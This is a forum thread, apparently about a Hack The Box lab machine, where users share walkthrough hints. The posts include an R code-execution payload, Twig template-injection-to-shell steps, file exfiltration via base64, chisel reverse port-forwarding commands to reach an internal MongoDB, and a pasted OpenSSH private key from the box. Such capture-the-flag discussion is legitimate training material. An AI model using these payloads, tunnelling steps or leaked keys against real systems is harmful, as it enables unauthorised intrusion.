Return to forum

aHai · May 5, 2022 at 6:11 PM

(April 12, 2022, 09:32 AM)pentester10 Wrote:
(April 11, 2022, 03:44 PM)Internetdreams Wrote: easy rce on rjeditor -> try(system("bash -c 'id'", intern = TRUE))
on the container go on /root/ unzip the .omv containing passwords for /bolt/ on :80.
Login as [email protected]:<PASSWORD>
TWIG SSTI to RCE on theme editing ; you got a shell as www-data you can ssh as saul from here with previous creds.

how to unzip .omv file in machine? or how to transfer that file to my machine?

base64 <filename>
and copy the code and past the content <filename>.b64 in your base machine

cat <filename>.b64 | base64 -d > filename.mov

unzip filename.mov

aHai · May 6, 2022 at 1:50 PM

(April 14, 2022, 07:33 PM)cavour12 Wrote: how to ssh with saul??? i spawn shell with www-data user privilage ...

i previous trying with pivoting and with -T option for Pseudo-terminal stdin problem ... obviously i tried with my host port 22 seems filtered !!

Any hint or tips for the user flag?

script -qc /bin/bash /dev/null

then try ssh

latai · May 7, 2022 at 8:42 PM

Rooted what a hard box

May 26, 2022 at 3:14 AM

woot! i got it. Yay for the win

keep at it!

yoske12 · May 31, 2022 at 4:57 PM

c0usc0us · June 5, 2022 at 12:39 PM

Which rshell did you guys use with stti ? Im not getting any callbacks

FringSquad · June 19, 2022 at 4:05 PM

(May 31, 2022, 04:57 PM)yoske12 Wrote: -----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

user?

bothack · July 20, 2022 at 11:46 AM

Anyone help!!!!!!!!!!

saul@talkative:~$ ./chisel client 10.10.x.x:8000 R:27017:172.17.0.2:27017
-bash: ./chisel: No such file or directory
saul@talkative:~$

help :huh:

someRandom · July 22, 2022 at 7:13 PM

(July 20, 2022, 11:46 AM)bothack Wrote: Anyone help!!!!!!!!!!
saul@talkative:~$ ./chisel client 10.10.x.x:8000 R:27017:172.17.0.2:27017
-bash: ./chisel: No such file or directory
saul@talkative:~$
help :huh:

build chisel without the debug flags (it's -lgflags-"-s -w" or something) and reduce the size of the binary you have to pass by 30%.
then do "upx brute chisel", reduce it further. should be like 2.5 megs as compared to like 10 or 11. not super important but it's a good tip to know

then set up a basic python server, write chisel to /dev/shm or tmp. do md5sum on chisel to make sure it copied okay

then on attacker : chisel server -p 8000 --reverse

on saul ./chisel client 10.10.WhateverYourIPIs:8000 R:8001:172.17.0.2:27017

this tells it that you are listening at 8000. you want to access port 27017. you can access it at 8001.

test it by going to 0.0.0.0:8001 in browser. it should give a warning about accessing mongo through the port or something. if you see that it's working. in real life you wouldn't really want to use quad 0's but this is okay here.

now install mongosh. in this example we are accessing port 27017 on port 8001, locally. we want to tell mongosh to use our local port that is port forwarded.

mongosh --port 8001

someRandom · July 22, 2022 at 8:40 PM

me in 90 degree heat : i'll run bsondump so I can read this dump

computer : bitch you thought